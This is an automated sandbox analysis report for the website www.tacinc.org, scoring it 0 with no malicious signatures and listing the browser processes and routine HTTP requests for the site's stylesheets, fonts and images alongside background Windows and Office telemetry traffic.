Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://www.tacinc.org

Overview

General Information

Sample URL:http://www.tacinc.org
Analysis ID:1540472
Infos:

Detection

Score:0
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

No high impact signatures.

Classification

  • System is w10x64
  • chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 1424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2296,i,3073160073782762063,5984773800657840567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.tacinc.org" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50040 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50104 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.72
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/f953364aee27a43a60234e2b4425cdf5.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-7.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/css/fonts/fontawesome-webfont.woff2?v=4.3.0 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/css/fonts/ss-gizmo.woff HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/f36d1c67b2b5257dc0a6c9820472d804.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/logo.png HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/images/icon-close.png HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/734068639650f4963a14da140b3e84b8.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/socialdriver-framework/includes/page-builder/frontend-assets/css/spb-styles.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/logo.png HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/images/icon-close.png HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tac-tablepress-datatables-column-filter-widgets/css/ColumnFilterWidgets.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/f36d1c67b2b5257dc0a6c9820472d804.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/a61b308d4d6be7261fc816f90a3413fb.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-700.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-600.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-regular.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/css/fonts/lora-v16-latin-600.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-italic.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
